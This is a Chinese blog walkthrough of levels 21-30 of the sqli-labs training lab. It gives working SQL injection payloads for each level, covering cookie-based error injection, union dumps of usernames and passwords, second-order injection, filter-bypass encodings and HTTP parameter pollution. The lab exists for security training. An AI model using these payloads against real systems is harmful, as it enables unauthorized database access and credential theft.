sqli-labs靶场通关攻略(21-30关)

于 2024-08-26 08:48:29 发布
阅读量915 收藏 14
点赞数 12
文章标签: 数据库 oracle sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141548300
版权

 Less-21

步骤一:页面输入admin 123456 登录

可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。

解码查看

步骤二:Burp Suite 抓包,并且把抓到的数据发送到重放器上

步骤三:采用报错注⼊函数获取其当前数据库名称

')and updatexml(1,concat(1,database()),1)#编码

步骤四:查表名

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#编码

步骤五:查列名

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码

步骤六:查看users表中所有信息

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码

Less-22

 步骤一:页面输入admin 123456 登录

可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。

步骤二:Burp Suite 抓包,并且把抓到的数据发送到重放器上

步骤三:采用报错注⼊函数获取其当前数据库名称

"and updatexml(1,concat(1,database()),1)#编码

步骤四:查表名

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#编码

步骤五:查列名

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码

步骤六:查看users表中所有信息

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码

Less-23

步骤一,测试闭合方式

输入单引号报错,但是注释符不管用。猜测注释符被过滤,查看源码果然被注释了,所以我们可以用单引号闭合,发现成功。

?id=1' or '1'='1

步骤二:查看数据库

?id=-1' union select 1,database(),3 or '1'='1

步骤三:查看表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1'='1

步骤四:查列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' or '1'='1

Less-24

二次注入:

步骤一:点击" New User click Here "并注册用户名为 admin'#

步骤二:对注册的账号 admin'# 进⾏登录并修改密码

步骤三:打开数据库查看发现,admin'#密码并没有被改,admin密码被改了

Less-25

页面提示是将or和and这两个替换成空,可以采取双写绕过

步骤一:查看表名

information里面涉及or可以写成infoorrmation

?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

步骤二:查看列

information里面涉及or可以写成infoorrmation

and改为anandd

?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'--+

Less-26

逻辑运算符,注释符以及空格给过滤了,我们需要使用1'and'进行闭合,逻辑运算符使用双写或者&&和||替换。空格用括号替换

步骤一:查看数据库名

?id=1'||(updatexml(1,concat(1,(select(database()))),1))||'

步骤二:查看表名

?id=1'||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'

步骤三:查看users表中的列名

?id=1'||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'

步骤四:查看users表中信息

?id=1'||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||'

Less-27

过滤了空格,select和union,我们可以大小写绕过,空格用%09替换

步骤一:查看数据库名

?id=1'and%09updatexml(1,concat(1,(sElect%09database())),1)and'

步骤二:查看表名

?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security')),1)and'

步骤三:查看users表中列名

?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users')),1)and'

步骤四:查看users表中信息

?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and'

Less-28

过滤了空格,union和select,空格用%0A替换,union select双写替换

步骤一:查看表名

?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1

步骤二:查看users表中列名

?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1

Less-29

对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入

步骤一:查看数据库名

?id=1&id=-1'union select 1,database(),3 --+

步骤二:查看表名

?id=1&id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三:查看users表中列名

?id=1&id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤四:查看users表中信息

?id=1&id=-1'union select 1,2,group_concat(id,username,password) from users --+

Less-30

 对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入

步骤一:查看数据库名

?id=1&id=-1"union select 1,database(),3 --+

步骤二:查看表名

?id=1&id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三:查看users表中列名

?id=1&id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤四:查看users表中信息

?id=1&id=-1"union select 1,2,group_concat(id,username,password) from users --+

青衫木牛马
关注
sqli-labs 21——40攻略
weixin_45880717的博客
02-02 1103
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2003
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs靶场通关攻略(21-25
最新发布
Nai_zui_jiang的博客
08-22 343
我们输入账号密码进行登录后,发现cookie被进行了编码。这和上一是一样的,只是闭合方式换成了双引号。那么我们进行抓包注入的时候就得进行编码了。还是登录进行抓包,并用编码后进行发送查询。这是get传参,输入id=1试一试。成功注入就可以看到数据库名了。后面其他步骤也是同样的方法。
sqli-labs靶场通关攻略 (二十一到三十
2301_81881972的博客
08-22 1329
')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码。')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码。
sqli-labs通关(less21~less30
箭雨镜屋
09-03 3392
Less21刚开始还是和Less20一样,进去是个登录的页面 输入正确的用户名和密码之后,返回的页面有User-Agent,客户端ip地址,cookie,用户名,密码,用户id等信息 登录过程中burpsuite也是抓到两个报文,第一个是发送用户名和密码的POST报文,第二个是GET报文且携带cookie 仔细看这的GET报文,就和上一不一样了,Cookie中uname参数的值是base64编码的。 把uname的值粘贴到burpsuite的decoder模块,先decod.
sql-labs靶场(1-21通关方式
c_nzj的博客
07-06 1120
本文章将进行sql-labs靶场21通过演示供大家阅读查询,事先安装方法与环境将不在演示。
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1537
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 805
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1667
这一在web应用前有一个waf,在卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1316
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sql-labs 闯 21~25
qq_44663230的博客
08-29 1447
sql-labs 闯21~25
Sqlilabs-21
KAKA的博客
07-09 639
来到了第 21 ,看着 21 ,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文… 这一卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样… Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入] uname=YWRtaW4nKSBhbm
sqli-labs 21 - 30
weixin_44843084的博客
05-29 473
sqli-labs 21 - 30 less21 登陆后 cookie的uname值是base64加密 试了几次,格式是’) 依旧是3列 剩下的跟上题一样 less22 跟上一题一样,格式是" less23 又回到get了[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 闭合是’ 直接注释好像有什么问题(应该是被过滤了 语句可能是类似id=’$id’ limit 0,1?(好像真的是 这样是可以的 但是不能1' order by 4 and '1'='1(还是上图
sqli-labs-master第21、22
m_ing
05-16 1740
前言:昨天我们研究了http头部cookie注入,反正我是让让抓包软件给搞死了,废了老半天劲!我们来研究下加密后的cookie 第21: 看到这个页面我们还是输入用户密码,返回了这个页面 提示了一系列的信息 我们还是抓包分析下 看到了加密后的cookie 我们查看源代码,看看是怎样的加密方式 是被base64加码算法加密了 我们找个解密软件或者相的程序 我们输入的用户就是admin所以解密正确 先构造语句验证是否存在注入,admin’经过base64编码后YWRtaW4n,带入测试发现报错
sqli-labs 21-25
willow_liang的博客
11-05 370
Less21 代码分析 payload D')and extractvalue(1,concat(0x7e,(select database()),0x7e))# base64转码后: RCcpYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSkpIw== 用burp抓第二个页面刷新重新获取cookie的数据包 Less22 代码分析 payload RCJhbmQgZXh0cmFjdHZhbHVlKD
SQLi LABS Less-21
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlibals21SQLI-LABS第二十一sqlilabs二十一
Sqllab记录(21~30)白盒测试
m0_56375711的博客
12-06 450
sqllab记录(20~30)白盒测试
sqli-labs21基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 583
21基于cookie报错注入 其实测试语句和20差不多,但是需要转码,转成base64再带入到cookie中,然后(base64在bp中有模块) 一、判断注入点 没转码之前 ' )and extractvalue(1,concat(0x7e,( 1),0x7e))# JyApYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLCggMSksMHg3ZSkpIyA= (这里的思想是先不用闭合点,进行转码,一点一点试出来,然后报错出1的话,就是闭合点) 二、爆库 ' )a
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,访问sqli-labs的首页,通常是 http://localhost/sqli-labs/。 3. 在首页上,你会看到一系列的级别和挑战。从级别1开始,逐步挑战更高级别的注入漏洞。 4. 阅读每个级别的说明和提示,理解目标和漏洞类型。 5. 使用SQL注入的技巧来寻找漏洞并进行利用。一些常见的注入技巧包括:使用单引号、双引号绕过输入过滤、使用UNION SELECT语句、使用注释符绕过过滤、使用布尔盲注等。 6. 尝试不同的Payload(载荷)来获取敏感信息或执行恶意操作。例如,获取数据库的表名、列名、数据内容,或者尝试修改数据库中的数据。 7. 当你成功获取到键信息或者完成了特定的目标,即可认为通关。 需要注意的是,在进行sqli-labs靶场挑战时,请确保你在合法的环境中进行,不要尝试攻击他人的系统或进行非法活动。同时,及时备份并恢复你的环境,以防误操作导致数据丢失。 希望这些步骤和提示对你有所帮助!如有更多问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值